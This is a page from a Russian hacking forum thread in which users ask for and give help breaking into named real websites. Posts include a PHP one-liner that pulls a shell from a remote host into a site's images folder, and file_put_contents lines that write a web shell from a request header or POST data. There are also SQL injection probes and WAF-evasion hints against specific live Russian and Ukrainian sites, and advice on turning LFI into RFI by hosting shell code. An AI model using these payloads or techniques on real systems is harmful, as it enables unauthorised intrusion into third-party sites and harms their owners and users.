Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1055 of 1207
  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    <?php copy('http://x/x.php', '/var/www/htdocs/images/x.php'); ?>
     
    _________________________
    #21081 BigBear, 20 Sep 2012
    1 person likes this.
  2. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    В случаях ,если IPTABLES strict's or allow_url_fopen=Off ->

    file_put_contents('/path/shell.php',$_SERVE['HTTP_USER_AGENT']);

    or

    file_put_contents('/path/shell.php',$_POST['data']);
     
    #21082 Cennarios, 20 Sep 2012
  3. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    Почему то не могу раскрутить
    http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780'
    даже Havij не справился
    посмотрите
     
    #21083 Hapk, 22 Sep 2012
  4. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    там защита он инъекций, фильтруется union selectt, дальше не смотрел
     
    #21084 justonline, 22 Sep 2012
  5. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    и что больше нечего нельзя сделать?
     
    #21085 Hapk, 22 Sep 2012
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780+and+1=1+group+by+40+--+

    TRUE

    Ну полей 40 - с этим бы будем считать, что определились...

    Теперь надо обойти WAF

    UPDATE Фильтруются скобки. Думаю - можешь забить на этот сайт...
     
    _________________________
    #21086 BigBear, 22 Sep 2012
    Last edited: 22 Sep 2012
  7. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Подскажите пожалуйста что прописать в google чтоб он выдал результаты на который требуеться авторизация как .htaccess?
    Пример.
    http://195.112.109.83/
    http://79.170.27.106/

    Незнал где задать вопрос написал здесь,если не правильно просьба модераторов переместить.Спасибо.
     
    #21087 Sat-hacker, 22 Sep 2012
  8. pvitalik80

    pvitalik80 New Member

    Joined:
    22 Sep 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    LFI уязвимость
    include $_GET['include_path'] . '/include/some/file.php';

    Нулл-символ экранируется. Версия PHP 5.2.17. Реально ли что-то с этим с делать?
     
    #21088 pvitalik80, 23 Sep 2012
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Ну если я правильно то понял, то возможно RFI c условиями, что

    1) allow_url_include = On

    2) На своём сервере создать путь /include/some/file.php и в качестве file.php разместить шелл-код.

    Вариант событий второй...

    Юзать дальше LFI и добраться до любых логов при использовании альтернативы нулл-байта, например 4096 слэшей, почитать об этом можно тут
     
    _________________________
    #21089 BigBear, 23 Sep 2012
    Last edited: 23 Sep 2012
  10. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Google не индексирует такие страницы.

    Всё достаточно просто.

    Если есть возможность проинклудить файл с другого сервера:

    http://site.com/shell.php?/include/some/file.php

    Если такой возможности нет, то стоит обратить в первую очередь внимание на работу других функций с $_GET['include_path'], а они есть т.к. Null-байт вырезаеться и на _https://forum.antichat.ru/thread98525.html
     
    #21090 randman, 23 Sep 2012
  11. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Интересно как этот сервис находит.
    http://www.shodanhq.com/
     
    #21091 Sat-hacker, 23 Sep 2012
  12. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    104
    Likes Received:
    14
    Reputations:
    5
    ну вот и используйте API этого сервиса :)

    http://docs.shodanhq.com/
     
    #21092 m00c0w, 23 Sep 2012
    Last edited: 23 Sep 2012
    2 people like this.
  13. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Думаю, по коду 401 - Unauthorized
     
    _________________________
    #21093 BigBear, 23 Sep 2012
  14. pvitalik80

    pvitalik80 New Member

    Joined:
    22 Sep 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Возможности RFI нету, проверил альтернативы по ссылкам, тоже не получилось. Теперь думаю a LFI ли это.
    Такая ситуация, я открываю index.php?include_path=http://google.com скрипт подвисает и вылетает по таймауту. Если делают так index.php?include_path=somesome.php ничего не происходит.
    На этом же сервере, но с другого акка, проверил include "http://google.com"; скрипт не подвис, а просто выдал ошибку "URL file-access is disabled in the server configuration".

    Вопрос, так что же все-таки творится в скрипте, почему он подвисает?
     
    #21094 pvitalik80, 23 Sep 2012
  15. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    скинь в ЛС ссылку,посмотрю,возможно помогу.
     
    #21095 Faaax, 23 Sep 2012
  16. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    http://neoncolor.ru/catalog/?gr=18'
    http://xao.ru/review'
    http://oring.com.ua
    не могу раскрутить :) хелп?)
     
    #21096 justonline, 24 Sep 2012
  17. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Скуль есть
    http://neoncolor.ru/catalog/?gr=(18)and(10)=10
    http://neoncolor.ru/catalog/?gr=(18)and(10)=11
     
    #21097 Pirotexnik, 24 Sep 2012
  18. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    однако моих скромных знаний не хватило.
     
    #21098 justonline, 24 Sep 2012
  19. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    там дб, скорее всего, не мускул.
    По крайней мере sleep() она не знает.

    В общем проинжектится, думаю, можно, но как я не знаю.
     
    #21099 Pirotexnik, 24 Sep 2012
  20. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    зато connection_id() знает, так что мускул ;)
    http://neoncolor.ru/catalog/?gr=18+and+connection_id()=connection_id()
     
    #21100 M_script, 24 Sep 2012
(You must log in or sign up to post here.)
Page 1055 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.